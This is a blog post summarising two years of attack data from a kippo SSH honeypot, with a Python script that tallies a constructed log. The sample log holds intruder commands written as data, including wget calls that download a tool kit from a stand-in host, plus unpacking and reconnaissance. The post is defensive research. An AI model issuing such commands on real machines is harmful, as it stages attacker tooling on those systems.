For over two years now, my ssh-honeypot kippo (developed by Upi Tamminen) has been receiving “visits” from all over the world. With an easy-to-guess root password (123456) to shorten the brute-force attacks, I have gathered some interesting data/statistics.

So to sum things up:

First attack on: Monday, 26-Jul-2010, 09:11 AM
Total login attempts: 474433
Distinct source IP addresses: 2254

With help from the kippo-graph project by @ikoniaris, here are some stats.


So, almost half a million login attempts. That's a lot considering the honeypot holds only one IP address!

When the attackers are “in” they do all kinds of things. They change the root password for future use which is fine by me. This way I get some extra insight on the passwords they commonly use. The password isn't really changed of course, the honeypot just plays along.

They download Windows service packs, for instance. When done, they throw them away again. Why? Well, my guess is that they are just trying out my bandwidth to determine the amount of spam they can send out.
Some attacks seem to have similarities like checking out the cpu-info for instance.

And yes, they download the tools of their trade.

Here are some numbers on that:

Total number of downloads: 774
Distinct number of downloads: 510

And they simply use the wget command to copy their tools from download locations like
And you know what, that's just fine by me too. Oh, and thanks for the copy!
They can even unpack the tools. But no, they can't use them. We don't want to be a staging point for them to attack more machines now, do we?
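
The kind of tally reported above (login attempts, distinct source IPs, total versus distinct downloads, and what intruders do once they are in), as an added example that is not part of the original post or of kippo/kippo-graph. The log line layout, the sample lines, the URLs and the category names are constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample; the line layout is an assumption modelled on kippo's text log.
U = "[SSHService ssh-userauth on HoneyPotTransport"
C = "[SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport"
SAMPLE_LOG = f"""\
2012-12-01 10:00:01+0100 {U},1,192.0.2.10] login attempt [root/password] failed
2012-12-01 10:00:03+0100 {U},1,192.0.2.10] login attempt [root/123456] succeeded
2012-12-01 10:00:09+0100 {C},1,192.0.2.10] CMD: passwd
2012-12-01 10:00:15+0100 {C},1,192.0.2.10] CMD: cat /proc/cpuinfo
2012-12-01 10:00:21+0100 {C},1,192.0.2.10] CMD: wget http://dl.example.net/servicepack.exe
2012-12-01 10:01:02+0100 {C},1,192.0.2.10] CMD: wget http://tools.example.org/kit.tgz
2012-12-01 10:01:10+0100 {C},1,192.0.2.10] CMD: tar xzf kit.tgz
2012-12-02 03:12:44+0100 {U},2,198.51.100.7] login attempt [root/123456] succeeded
2012-12-02 03:12:50+0100 {C},2,198.51.100.7] CMD: wget http://tools.example.org/kit.tgz
"""

LINE = re.compile(r"HoneyPotTransport,\d+,(?P<ip>[0-9.]+)\] (?P<msg>.*)$")
LOGIN = re.compile(r"login attempt \[[^/]*/.*\] (?:succeeded|failed)$")
URL = re.compile(r"(?:https?|ftp)://\S+")
CATEGORIES = [  # hypothetical labels; the first matching pattern wins
    ("password_change", re.compile(r"^\s*passwd\b")),
    ("download", re.compile(r"\bwget\b")),
    ("recon", re.compile(r"/proc/cpuinfo|\buname\b")),
    ("unpack", re.compile(r"\btar\b|\bunzip\b")),
]

def summarize(log_text):
    """Tally logins, source IPs, downloads and post-login actions."""
    logins, ips, urls, actions = 0, set(), [], Counter()
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue  # not a per-connection line
        ips.add(m["ip"])
        msg = m["msg"]
        if LOGIN.match(msg):
            logins += 1
        elif msg.startswith("CMD: "):
            cmd = msg[5:]
            label = next((n for n, rx in CATEGORIES if rx.search(cmd)), "other")
            actions[label] += 1
            if label == "download":
                urls += URL.findall(cmd)
    return {"login_attempts": logins, "distinct_ips": len(ips), "actions": dict(actions),
            "downloads_total": len(urls), "downloads_distinct": len(set(urls))}

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

The gap between total and distinct downloads is the same kit being fetched again by different sessions.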

So, who are those people? Well, they are criminals for a start! Where do they come from? Analyzing the tools shows a lot of Romanian comment lines in their scripts. But that doesn’t mean that the attackers have to come from Romania as well! They can come from all over the world.

Here is my top 10
And this is an image with worldwide results

The grey icons mean at least one attack and the blue ones more than one.

So there are people out there who make money using other people's bandwidth. It seems they don’t even care if they are detected. Some of them even tried to communicate with me (swear words mostly).

It was interesting to see how the attacks developed. The tools the attackers used. Yes, even the typos they made.
Fun times in general and most important, I learned a lot from my adversaries.
I plan to deploy more honeypots like kippo in the coming year.

If people are interested in more information about the wonderful world of honeypots, do visit the Honeynet Project page or donate to this great non-profit organisation.
Follow @ProjectHoneynet on Twitter or “like” the Facebook page for the latest updates and information on the various honeypot projects and challenges.

2012 has been a good year. Let's make 2013 even better!
